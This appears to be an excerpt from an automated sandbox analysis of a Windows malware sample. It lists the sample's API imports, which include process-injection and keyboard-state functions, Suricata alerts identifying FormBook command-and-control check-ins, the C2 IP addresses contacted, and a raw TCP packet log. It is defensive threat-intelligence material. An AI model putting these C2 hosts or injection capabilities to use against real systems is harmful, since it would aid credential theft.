                                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishGreat Britain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-05T19:39:33.610591+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749753104.21.77.7180TCP
                                                            2024-12-05T19:39:50.538723+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74979013.248.221.24380TCP
                                                            2024-12-05T19:39:50.538723+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.74979013.248.221.24380TCP
                                                            2024-12-05T19:39:53.202380+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74980013.248.221.24380TCP
                                                            2024-12-05T19:39:55.875039+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74980613.248.221.24380TCP
                                                            2024-12-05T19:39:58.567032+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74981413.248.221.24380TCP
                                                            2024-12-05T19:40:06.746206+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749834163.44.185.18380TCP
                                                            2024-12-05T19:40:09.421842+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749840163.44.185.18380TCP
                                                            2024-12-05T19:40:12.187654+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749846163.44.185.18380TCP
                                                            2024-12-05T19:40:14.756618+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749852163.44.185.18380TCP
                                                            2024-12-05T19:40:21.936562+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749872104.21.41.7480TCP
                                                            2024-12-05T19:40:24.608338+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749880104.21.41.7480TCP
                                                            2024-12-05T19:40:27.264616+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749886104.21.41.7480TCP
                                                            2024-12-05T19:41:08.348736+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749892104.21.41.7480TCP
                                                            2024-12-05T19:41:16.108628+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74998485.159.66.9380TCP
                                                            2024-12-05T19:41:18.770881+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74998585.159.66.9380TCP
                                                            2024-12-05T19:41:21.436794+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74998685.159.66.9380TCP
                                                            2024-12-05T19:41:23.933756+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74998785.159.66.9380TCP
                                                            2024-12-05T19:41:31.389983+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749988103.21.221.480TCP
                                                            2024-12-05T19:41:34.061876+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749989103.21.221.480TCP
                                                            2024-12-05T19:41:36.718050+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749990103.21.221.480TCP
                                                            2024-12-05T19:41:39.431492+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749991103.21.221.480TCP
                                                            2024-12-05T19:41:46.204411+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749992104.21.62.18480TCP
                                                            2024-12-05T19:41:48.859135+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749993104.21.62.18480TCP
                                                            2024-12-05T19:41:51.521368+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749994104.21.62.18480TCP
                                                            2024-12-05T19:41:54.185382+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749995104.21.62.18480TCP
                                                            2024-12-05T19:42:01.171722+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999666.29.137.1080TCP
                                                            2024-12-05T19:42:03.802758+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999766.29.137.1080TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 5, 2024 19:39:32.160937071 CET4975380192.168.2.7104.21.77.71
                                                            Dec 5, 2024 19:39:32.280806065 CET8049753104.21.77.71192.168.2.7
                                                            Dec 5, 2024 19:39:32.280920029 CET4975380192.168.2.7104.21.77.71
                                                            Dec 5, 2024 19:39:32.291562080 CET4975380192.168.2.7104.21.77.71
                                                            Dec 5, 2024 19:39:32.411552906 CET8049753104.21.77.71192.168.2.7
                                                            Dec 5, 2024 19:39:33.609416008 CET8049753104.21.77.71192.168.2.7
                                                            Dec 5, 2024 19:39:33.610512018 CET8049753104.21.77.71192.168.2.7
                                                            Dec 5, 2024 19:39:33.610590935 CET4975380192.168.2.7104.21.77.71
                                                            Dec 5, 2024 19:39:33.612971067 CET4975380192.168.2.7104.21.77.71
                                                            Dec 5, 2024 19:39:33.732713938 CET8049753104.21.77.71192.168.2.7
                                                            Dec 5, 2024 19:39:49.252712965 CET4979080192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:49.372580051 CET804979013.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:49.372718096 CET4979080192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:49.388859987 CET4979080192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:49.508692980 CET804979013.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:50.538296938 CET804979013.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:50.538649082 CET804979013.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:50.538722992 CET4979080192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:50.905113935 CET4979080192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:51.923948050 CET4980080192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:52.044003963 CET804980013.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:52.044110060 CET4980080192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:52.059921980 CET4980080192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:52.179781914 CET804980013.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:53.202189922 CET804980013.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:53.202308893 CET804980013.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:53.202379942 CET4980080192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:53.561253071 CET4980080192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:54.580714941 CET4980680192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:54.700544119 CET804980613.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:54.700716019 CET4980680192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:54.716480017 CET4980680192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:54.836425066 CET804980613.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:54.836462975 CET804980613.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:55.860114098 CET804980613.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:55.874865055 CET804980613.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:55.875039101 CET4980680192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:56.217617035 CET4980680192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:57.236529112 CET4981480192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:57.356441975 CET804981413.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:57.356576920 CET4981480192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:57.366792917 CET4981480192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:57.487524986 CET804981413.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:58.566637039 CET804981413.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:58.566951990 CET804981413.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:39:58.567032099 CET4981480192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:58.569824934 CET4981480192.168.2.713.248.221.243
                                                            Dec 5, 2024 19:39:58.689580917 CET804981413.248.221.243192.168.2.7
                                                            Dec 5, 2024 19:40:05.195498943 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:05.315453053 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:05.315676928 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:05.331855059 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:05.451809883 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.745906115 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.745925903 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.745938063 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.745982885 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.745995998 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.746009111 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.746022940 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.746206045 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.746318102 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.746332884 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.746381044 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.746455908 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.746503115 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.842713118 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.866046906 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.866117954 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.866162062 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.866200924 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.870292902 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.870353937 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.937959909 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.938023090 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.938055992 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.938081980 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.940411091 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.940476894 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.940495968 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.940538883 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.948781013 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.948863983 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.952348948 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.952398062 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:07.861762047 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:07.981832981 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:07.981972933 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:07.997749090 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:08.117733955 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421608925 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421771049 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421782017 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421842098 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.421875954 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421888113 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421905041 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421916008 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421926975 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.422019958 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.422019958 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.422504902 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.422517061 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.422552109 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.514529943 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.542701006 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.542932987 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.591574907 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.591614962 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.591870070 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.591871023 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.614664078 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.614681005 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.614790916 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.614790916 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.616842985 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.616913080 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.616945982 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.616986990 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.625215054 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.625262022 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.628789902 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.628845930 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:10.533938885 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:10.653819084 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:10.653923988 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:10.670095921 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:10.790082932 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:10.790115118 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.187654018 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.253809929 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253829002 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253845930 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253895998 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253907919 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253918886 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253940105 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253956079 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.253958941 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253983974 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.253983974 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.254024982 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.254036903 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.254038095 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.254209042 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.254220009 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.254232883 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.254244089 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.254271030 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.353203058 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.353274107 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:13.205251932 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:13.324953079 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:13.325191021 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:13.334870100 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:13.454806089 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756237030 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756263971 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756285906 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756300926 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756536007 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756547928 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756560087 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756618023 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.756656885 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.756881952 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756897926 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756946087 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.757006884 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.757095098 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.876812935 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.876836061 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.877088070 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.880789042 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.920840979 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.948446035 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.948491096 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.948806047 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.952681065 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.952713966 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.952946901 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.961159945 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.961190939 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.961375952 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.965362072 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.965591908 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.966609955 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:15.086338997 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:20.297852993 CET4987280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:20.417604923 CET8049872104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:20.417684078 CET4987280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:20.432786942 CET4987280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:20.552671909 CET8049872104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:21.936562061 CET4987280192.168.2.7104.21.41.74
